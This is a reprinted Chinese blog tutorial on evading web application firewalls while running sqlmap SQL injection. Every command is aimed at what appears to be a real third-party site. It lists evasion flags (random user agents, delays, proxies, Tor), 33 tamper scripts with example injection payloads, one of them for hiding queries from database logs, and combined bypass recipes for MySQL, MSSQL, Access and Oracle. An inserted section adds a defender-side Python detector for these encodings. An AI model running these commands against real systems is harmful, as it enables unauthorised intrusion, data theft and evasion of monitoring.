http://blog.csdn.net/qq_29277155/article/details/51193071
(Reprint) Injection testing with sqlmap while bypassing a firewall
0x00 Foreword
Today's network environments usually have a WAF/IPS/IDS in front of the web server. This protection filters and blocks our SQL injection query requests, and may even block our host IP, so at that point we have to consider how to bypass it in order to inject against the target. Current WAF/IPS/IDS products have blacklisted sqlmap's signatures, so its default requests are recognized. Even so, the sqlmap-based bypass techniques introduced here are still practical and effective: the strategies below can succeed in a given environment, but whether a bypass actually worked has to be confirmed by carefully reviewing the output.
0x01 Confirming the WAF
First, determine whether the web server is protected by a WAF/IPS/IDS. This is easy: during vulnerability scanning, or with a dedicated tool, we can detect whether a WAF is present, for example with nmap NSE scripts or with the policies of WVS or AppScan. Here we also introduce using sqlmap itself to detect whether a WAF/IPS/IDS is present:
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --threads 10 --identify-waf   # preferred
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --threads 10 --check-waf   # alternative
0x02 Bypassing with parameters
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --random-agent -v 2   # random browser User-Agent; useful especially when the WAF is misconfigured
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --hpp -v 3   # HTTP parameter pollution; useful especially on the ASP.NET/IIS platform
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5 --time-sec=60   # long delays to avoid triggering the WAF's rate-based blocking; a slow approach
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --proxy=http://211.211.211.211:8080 --proxy-cred=211:985   # inject through a proxy
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --ignore-proxy   # ignore the system proxy and connect directly
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --flush-session   # discard the saved session and start the injection over
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --hex   # or --no-cast: change the character encoding used for data retrieval
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --mobile   # imitate a smartphone User-Agent
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --tor   # anonymous injection through Tor
0x03 Using tamper scripts
1 Usage format:
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --tamper=A.py,B.py   # script A, script B
2 Common scripts:
01 apostrophemask.py # replaces the apostrophe with its UTF-8 full-width counterpart; Example: ("1 AND '1'='1") -> '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'
02 equaltolike.py # MSSQL, SQLite: replaces the equals sign with LIKE; Example: Input: SELECT * FROM users WHERE id=1; Output: SELECT * FROM users WHERE id LIKE 1
03 greatest.py # MySQL: bypasses filtering of '>' by replacing the greater-than comparison with GREATEST; Example: ('1 AND A > B') -> '1 AND GREATEST(A,B+1)=A'
04 space2hash.py # replaces spaces with '#' followed by a random string and a newline; Example: Input: 1 AND 9227=9227; Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
05 apostrophenullencode.py # MySQL 4, 5.0 and 5.5, Oracle 10g, PostgreSQL: bypasses apostrophe filtering by replacing the apostrophe with its illegal double-unicode counterpart (%00%27)
06 halfversionedmorekeywords.py # MySQL < 5.1: adds a versioned MySQL comment before each keyword to bypass the firewall
07 space2morehash.py # MySQL: replaces spaces with '#' followed by a random string and a newline
08 appendnullbyte.py # Microsoft Access: appends a NULL byte (%00) at the end of the payload; Example: ('1 AND 1=1') -> '1 AND 1=1%00'
09 ifnull2ifisnull.py # MySQL, SQLite (possibly), SAP MaxDB: bypasses filtering of IFNULL by replacing 'IFNULL(A, B)' with the equivalent 'IF(ISNULL(A), B, A)'
10 space2mssqlblank.py # MSSQL: replaces spaces with other valid blank characters
11 base64encode.py # Base64-encodes the whole payload; Example: ("1' AND SLEEP(5)#") -> 'MScgQU5EIFNMRUVQKDUpIw=='; Requirement: all
12 space2mssqlhash.py # MSSQL: replaces spaces with '#' followed by a newline
13 modsecurityversioned.py # MySQL: wraps the complete query in a versioned comment, for filters that block spaces; Example: ('1 AND 2>1--') -> '1 /*!30874AND 2>1*/--'
14 space2mysqlblank.py # MySQL: replaces spaces with other valid whitespace characters
15 between.py # MS SQL 2005, MySQL 4, 5.0 and 5.5, Oracle 10g, PostgreSQL 8.3, 8.4, 9.0: replaces the greater-than operator (>) with a BETWEEN expression
16 space2mysqldash.py # MySQL, MSSQL: replaces the space character (' ') with a dash comment ('--') followed by a newline ('\n')
17 multiplespaces.py # adds multiple spaces around SQL keywords; Example: ('1 UNION SELECT foobar') -> '1  UNION   SELECT  foobar'
18 space2plus.py # replaces spaces with '+'; Example: ('SELECT id FROM users') -> 'SELECT+id+FROM+users'
19 bluecoat.py # MySQL 5.1, SGOS: replaces the space after SQL keywords with a valid random whitespace character, then replaces '=' with LIKE
20 nonrecursivereplacement.py # replaces predefined SQL keywords with representations that survive non-recursive replacement filters (e.g. .replace("SELECT", ""))
21 space2randomblank.py # replaces the space character (' ') with a random character from a set of valid alternate blank characters
22 sp_password.py # appends 'sp_password' to the end of the payload so that the DBMS automatically obfuscates the query in its logs
23 chardoubleencode.py # double URL-encodes the payload (already encoded characters are not processed)
24 unionalltounion.py # replaces UNION ALL SELECT with UNION SELECT; Example: ('-1 UNION ALL SELECT') -> '-1 UNION SELECT'
25 charencode.py # Microsoft SQL Server 2005, MySQL 4, 5.0 and 5.5, Oracle 10g, PostgreSQL 8.3, 8.4, 9.0: URL-encodes the payload
26 randomcase.py # Microsoft SQL Server 2005, MySQL 4, 5.0 and 5.5, Oracle 10g, PostgreSQL 8.3, 8.4, 9.0: randomizes the case of keyword characters
27 unmagicquotes.py # wide-character bypass of GPC addslashes; Example: Input: 1' AND 1=1; Output: 1%bf%27 AND 1=1--%20
28 randomcomments.py # splits SQL keywords with /**/ comments; Example: 'INSERT' becomes 'IN/**/S/**/ERT'
29 charunicodeencode.py # ASP, ASP.NET: Unicode-URL-encodes the payload
30 securesphere.py # appends a special crafted string; Example: ('1 AND 1=1') -> "1 AND 1=1 and '0having'='0having'"
31 versionedmorekeywords.py # MySQL >= 5.1.13: encloses each keyword in a versioned MySQL comment
32 space2comment.py # replaces the space character (' ') with comments '/**/'
33 halfversionedmorekeywords.py # MySQL < 5.1: adds a versioned MySQL comment before each keyword
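As an added defender-side example (not from the original post and not sqlmap code), the following Python normalizer undoes the encodings and whitespace substitutions the scripts above produce, so that a signature check sees the plain query; the sample parameter values are constructed here to imitate those scripts' output, and the same normalization covers the combined strategies in section 0x04, which only stack these transformations.

```python
import re
from urllib.parse import unquote

# Constructed parameter values imitating the tamper scripts' output (not real traffic).
SAMPLES = {
    "space2comment+randomcase": "1/**/uNiOn/**/SeLeCt/**/1,2,3",
    "space2plus+charencode": "1+%55NION+%53ELECT+1%2C2%2C3",
    "chardoubleencode": "1%2520UNION%2520SELECT%25201",
    "space2hash": "1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227",
    "space2mysqldash": "1--%0AAND--%0A9227=9227",
    "modsecurityversioned": "1 /*!30874AND 2>1*/--",
    "apostrophemask": "1 AND %EF%BC%871%EF%BC%87=%EF%BC%871",
    "randomcomments": "1 UN/**/ION SEL/**/ECT 1",
    "benign id": "51",
}

# Signatures evaluated on the normalized (lower-case, single-spaced) text.
SQLI = re.compile(
    r"\bunion\s*(all\s*)?select\b"                # UNION-based
    r"|\b(and|or)\s+'?\w+'?\s*(=|<|>|like\b)"     # tautology tests, incl. equaltolike
    r"|\bselect\b.*\bfrom\b"                      # bare SELECT ... FROM
    r"|\b(sleep|benchmark|greatest)\s*\("         # time-based, greatest.py
)
LINE_COMMENT_NL = re.compile(r"(#[^\n]*|--)\n")   # '#rnd\n' (space2hash) and '--\n' (space2mysqldash)
PLAIN_COMMENT = re.compile(r"/\*(?!!).*?\*/", re.S)  # /**/ (space2comment, randomcomments)
VERSIONED_MARK = re.compile(r"/\*!\d*|\*/")        # /*!30874 ... */ keeps its body (MySQL executes it)

def url_decode_fully(value: str) -> str:
    """Decode until stable so double (or deeper) URL encoding is undone."""
    prev = None
    while prev != value:
        prev, value = value, unquote(value.replace("+", " "))
    return value

def normalize(value: str, comment_repl: str) -> str:
    """Canonical form for matching; comment_repl is ' ' or ''."""
    text = url_decode_fully(value).replace("\uff07", "'")  # full-width apostrophe back to ASCII
    text = LINE_COMMENT_NL.sub(" ", text)
    text = PLAIN_COMMENT.sub(comment_repl, text)
    text = VERSIONED_MARK.sub(" ", text)
    return re.sub(r"\s+", " ", text).strip().lower()

def is_suspicious(value: str) -> bool:
    """A comment may stand in for a space or split a keyword, so both readings are tried."""
    return any(SQLI.search(normalize(value, repl)) for repl in (" ", ""))

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name:26} {'ALERT' if is_suspicious(raw) else 'ok':5} {normalize(raw, ' ')}")
```

The point of checking both comment readings is that space2comment and randomcomments use the identical /**/ token for opposite purposes, so a single canonical form misses one of them.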
0x04 Combining scripts and parameters into bypass strategies
1 MySQL bypass:
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --random-agent -v 2 --delay=3.5 --tamper=space2hash.py,modsecurityversioned.py
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --random-agent --hpp --tamper=space2mysqldash.py,versionedmorekeywords.py
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5 --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/38.0.696.12 Safari/534.24" --tamper=apostrophemask.py,equaltolike.py
NOTE: combine these strategies according to the feedback from the injection attempts, and adjust the combination as you go.
2 MSSQL:
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5 --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/38.0.696.12 Safari/534.24" --tamper=randomcase.py,charencode.py
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5 --hpp --tamper=space2comment.py,randomcase.py
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5 --time-sec=120 --tamper=space2mssqlblank.py,securesphere.py
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5 --tamper=unionalltounion.py,base64encode.py
3 MS Access:
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5 --random-agent --tamper=appendnullbyte.py,space2plus.py
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5 --random-agent --hpp --tamper=chardoubleencode.py
4 Oracle:
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=5 --random-agent --hpp --tamper=unmagicquotes.py,unionalltounion.py
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=5 --user-agent="Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0" --hpp --tamper=charunicodeencode.py,chardoubleencode.py
5 Recommendations:
Because the WAF may use whitelist rules, the key to choosing a strategy is to judge from the information shown with -v 3. Capture the User-Agent of a mainstream browser, add an appropriate delay, and combine it with transformations of the injected characters: case changes, whitespace, strings, comments, encoding, and so on.
With the parameters above and the 32 scripts we use in routine injection testing, trying all of these different combinations is quite time-consuming.
ps: Reprinted from http://blog.csdn.net/qq_29277155/article/details/51193071; thanks to the author for sharing.